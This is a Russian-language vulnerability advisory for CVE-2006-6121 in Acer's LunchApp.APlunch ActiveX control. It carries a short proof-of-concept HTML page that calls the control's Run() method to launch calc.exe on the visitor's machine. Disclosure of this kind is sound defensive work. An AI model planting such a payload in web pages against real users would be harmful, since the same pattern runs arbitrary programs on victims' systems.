Небезопасное использование метода "Run()" в Acer LunchApp.APlunch ActiveX компоненте
| Дата публикации: | 21.11.2006 |
| Всего просмотров: | 1487 |
| Опасность: | Высокая |
| Наличие исправления: | Инстуркции по устранению |
| Количество уязвимостей: | 1 |
| CVE ID: | CVE-2006-6121 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Acer LunchApp.APlunch ActiveX Control 1.x |
| Уязвимые версии: Acer LunchApp.APlunch ActiveX 1.0.0.0, возможно более ранние версии.
Описание: Уязвимость существует из-за того, что приложение использует небезопасный метод "Run()", который выполняет произвольные файлы, переданные ему в качестве аргумента. Удаленный пользователь может с помощью специально сформированной Web страницы выполнить произвольные локальные приложения не целевой системе. Пример:
<html>
<body>
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>
Решение: Способов устранения уязвимости не существует в настоящее время. |
|
| Ссылки: | About Acer Notebook LunchApp.APlunch ActiveX Control.... |